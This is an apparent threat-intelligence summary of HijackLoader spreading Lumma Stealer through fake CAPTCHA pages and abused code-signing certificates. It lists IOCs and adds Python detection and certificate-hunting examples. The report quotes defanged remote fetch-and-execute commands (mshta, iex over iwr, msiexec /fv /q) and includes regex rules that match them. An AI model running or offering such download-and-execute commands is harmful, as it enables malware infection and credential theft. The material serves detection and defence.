Evolution of HijackLoader: Exploiting Authentic Signing Certificates

Since mid-September 2024 there has been a surge in Lumma Stealer deployments using the HijackLoader loader, delivered via a fake CAPTCHA campaign that leads to PowerShell-based retrieval and execution of payloads. HarfangLab detected a signed HijackLoader sample on October 2, 2024, pivoted from its C2 to hunt additional abused code-signing certificates, and reported multiple certificates that were subsequently revoked. #LummaStealer #HijackLoader #HarfangLab #quickworldshop

Keypoints

  • Since mid-September 2024, Lumma Stealer has been increasingly deployed via the HijackLoader loader.
  • Infection begins with a fake CAPTCHA page that coerces victims to run clipboard-pasted PowerShell commands.
  • Three PowerShell delivery variants were observed: mshta.exe, raw PowerShell with iex, and msiexec.exe for silent download/execution.
  • Initial deployments used DLL sideloading packages to run a HijackLoader DLL that decrypts and executes an encrypted payload.
  • A signed, standalone HijackLoader binary was observed on 2024-10-02, showing low detection rates until the signing certificate was revoked.
  • HarfangLab used C2 pivoting and metadata heuristics to identify multiple abused code-signing certificates and additional signed malicious samples.
  • Abused certificates from several companies (Lider LLC, Hangzhou Rongyi, Shanghai Yungpu, LLC SEVER, Xi’an Tengyuanri) were reported and revoked.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – PowerShell and other scripting hosts were used to retrieve and execute payloads (‘PowerShell execution via scripts.’).
  • [T1059] MSHTA execution – mshta.exe is used to execute malicious code from a remote URL (‘Use of mshta.exe: The script leverages the Microsoft HTML Application Host to execute malicious code from a remote URL.’).
  • [T1059] Windows Installer execution – msiexec.exe was used for silent download and execution of payloads (‘Use of msiexec.exe: The script also employs the Microsoft Windows Installer to silently download and execute a payload from a remote URL.’).
  • [T1122] DLL Sideloading – HijackLoader is executed via DLL sideloading inside a package containing a legitimate binary and a malicious DLL (‘DLL sideloading to execute HijackLoader.’).
  • [T1071] Application Layer Protocol – Compromised samples communicate with command-and-control servers for further instructions (‘Communication with C2 servers for further instructions.’).
  • [T1003] Credential Dumping / Credential Access – Lumma Stealer is deployed to harvest credentials from infected hosts (‘Deployment of Lumma Stealer to harvest credentials.’).

Indicators of Compromise

  • [Hash – signed sample] Example signed HijackLoader SHA-256 – 1839b7152814b16b9f28326081f16bf9c5bbbb380005232c92d25c9a3e36e337, f158c65261bcab6e93927a219d12f596a4e40857bbd379f9889710ea17251e5e, and 70 more hashes.
  • [Domain / C2] Command-and-control hostnames – me3ar40.quickworld[.]shop, quickworld[.]shop.
  • [Certificate thumbprint] Abused code-signing certificates – 2DD67214D7C7274458CFECC78E4B51063869D8E3 (Lider LLC), FDD829D3B46933EF8015B70B6C3FCE6BA9675578 (Shanghai Yungpu Chemical Co.), and 3 more thumbprints.
  • [Certificate subject] Abused signing names – Lider LLC, Hangzhou Rongyi Network Technology Co., Ltd., Shanghai Yungpu Chemical Co., Ltd., LLC SEVER, Xi’an Tengyuanri Network Technology Co., Ltd.
  • [Repository] Associated IOCs published – GitHub repository with full IOC set: https://github.com/HarfangLab/iocs/tree/main/abused_certs_hijackloader

The technical infection chain begins with a malicious web page presenting a fake CAPTCHA. When a victim clicks the “I’m not a robot” prompt, a popup instructs the victim to press keyboard shortcuts that open a command prompt and paste a PowerShell one-liner from the clipboard; that PowerShell then downloads a ZIP, extracts it, and runs a binary. HarfangLab observed three PowerShell delivery variants in the wild: mshta.exe launching remote code (mshta hxxps://payload[.]url/…), raw PowerShell using Invoke-Expression to execute a remotely fetched script (iex (iwr hxxps://payload[.]url/a.txt -UseBasicParsing).Content), and msiexec.exe invoked to silently fetch and install a payload (msiexec.exe /fv hxxps://payload[.]url/DB2jh /q).
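The three delivery variants above can be matched in process-creation telemetry. The following is an added Python example (not from the HarfangLab report): the command lines are constructed from the report's defanged samples plus two benign controls, and the rule names are my own.

```python
import re

# Constructed process-creation command lines (not real telemetry); URLs are kept
# defanged (hxxps, placeholder host) exactly as the report quotes them.
SAMPLE_CMDLINES = [
    'mshta hxxps://payload[.]url/',
    'powershell -w hidden -c "iex (iwr hxxps://payload[.]url/a.txt -UseBasicParsing).Content"',
    'msiexec.exe /fv hxxps://payload[.]url/DB2jh /q',
    'msiexec.exe /i C:\\Windows\\Temp\\setup.msi /qn',   # local package, quiet: benign here
    'powershell -c "Get-Process | Out-File C:\\temp\\p.txt"',
]

REMOTE = r'h[tx]{2}ps?://'  # matches http(s):// and the defanged hxxp(s):// form

# One rule per delivery variant seen in the campaign.
RULES = {
    # mshta.exe given a remote URL as its argument
    "mshta_remote": re.compile(r'\bmshta(?:\.exe)?\b.*' + REMOTE, re.I),
    # Invoke-Expression over content fetched with Invoke-WebRequest
    "iex_iwr_remote": re.compile(
        r'\b(?:iex|invoke-expression)\b.*\b(?:iwr|invoke-webrequest)\b.*' + REMOTE, re.I),
    # msiexec.exe with /f* or /i pointing at a URL, followed by a quiet switch
    "msiexec_remote_quiet": re.compile(
        r'\bmsiexec(?:\.exe)?\b.*/(?:f\w*|i)\s+' + REMOTE + r'\S*.*\s/q\w*', re.I),
}

def classify(cmdline):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def hunt(cmdlines):
    """Map each matching command line to its rule hits; clean lines are dropped."""
    hits = {c: classify(c) for c in cmdlines}
    return {c: r for c, r in hits.items() if r}
```

Local msiexec installs and ordinary PowerShell usage are left unflagged so the rules key on the remote-fetch behaviour rather than on the host binaries alone.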

Analyzed ZIP payloads frequently contained a DLL sideloading package composed of a legitimate executable, a malicious sideloaded DLL, and sometimes an additional data file. The sideloaded DLL (HijackLoader) typically decrypts and executes an encrypted payload bundled in the package, which then downloads and launches a stealer implant (Lumma Stealer). On 2024-10-02 HarfangLab also observed a non-sideloaded, genuinely code-signed HijackLoader binary; its signature initially reduced detection rates until the signing certificate was revoked, after which detections improved.

For hunting abused certificates, HarfangLab pivoted from the known C2 domains (quickworld.shop) and searched telemetry for signed executables contacting those hosts, which surfaced multiple malicious signed samples and the certificates they abused. They then pivoted on executable version metadata (original filename, description, copyright) with two heuristics: a signed binary whose metadata matches a legitimate application that ships unsigned is suspicious, and a binary whose metadata matches a legitimate application but that is signed by a certificate other than the legitimate publisher's is suspicious. Iterating these pivots uncovered multiple abused certificates (Lider LLC, Hangzhou Rongyi, Shanghai Yungpu, LLC SEVER, Xi’an Tengyuanri), which were reported to their issuers and revoked, restoring detection coverage.
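The two-step hunt described above (C2 pivot to seed a certificate set, then the metadata heuristics iterated until the set stops growing), as an added Python example that is not HarfangLab's tooling: the Binary record, the LEGIT_APPS reference set, the hashes and the thumbprints are constructed placeholders; only the C2 hostnames come from the report.

```python
from dataclasses import dataclass
@dataclass(frozen=True)
class Binary:  # constructed telemetry record for one observed executable
    sha256: str
    original_name: str      # PE VersionInfo OriginalFilename
    signer_thumbprint: str  # "" when the file is unsigned
    contacted_hosts: tuple  # hostnames seen in network telemetry

# Constructed reference set: OriginalFilename of legitimate apps the loader
# imitates, mapped to their legitimate signer thumbprint ("" = ships unsigned).
LEGIT_APPS = {"notes.exe": "", "viewer.exe": "AAAA1111"}
KNOWN_C2 = {"quickworld.shop", "me3ar40.quickworld.shop"}  # hosts from the report
# Constructed samples; hashes and thumbprints are placeholders, not real values.
SAMPLES = [
    Binary("c0ffee01", "notes.exe", "BBBB2222", ("quickworld.shop",)),
    Binary("c0ffee02", "viewer.exe", "CCCC3333", ()),
    Binary("c0ffee03", "tool.exe", "CCCC3333", ()),
    Binary("c0ffee04", "viewer.exe", "AAAA1111", ()),   # legit app, legit signer
    Binary("c0ffee05", "notes.exe", "", ()),            # the unsigned legit app itself
]

def c2_pivot(binaries):
    """Step 1: signed executables that contacted a known C2 host."""
    return [b for b in binaries
            if b.signer_thumbprint and KNOWN_C2.intersection(b.contacted_hosts)]

def metadata_pivot(binaries, known_bad):
    """Step 2: signed binaries reusing a legitimate app's metadata under a signer
    other than the legitimate one, plus anything signed by an already flagged cert."""
    hits, thumbs = [], set(known_bad)
    for b in binaries:
        if not b.signer_thumbprint:
            continue  # this pivot only targets signed binaries
        legit_signer = LEGIT_APPS.get(b.original_name)
        if legit_signer is not None and legit_signer != b.signer_thumbprint:
            hits.append(b)
            thumbs.add(b.signer_thumbprint)
        elif b.signer_thumbprint in thumbs:
            hits.append(b)
    return hits, thumbs

def hunt(binaries):
    """Iterate: C2 hits seed the certificate set; metadata hits expand it until stable."""
    seeds = {b.signer_thumbprint for b in c2_pivot(binaries)}
    while True:
        hits, thumbs = metadata_pivot(binaries, seeds)
        if thumbs == seeds:
            return hits, thumbs
        seeds = thumbs
```

Each certificate the loop adds is a candidate for manual confirmation before it is reported to its issuer; a metadata match alone is a hunting lead, not proof of abuse.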

Read more: https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/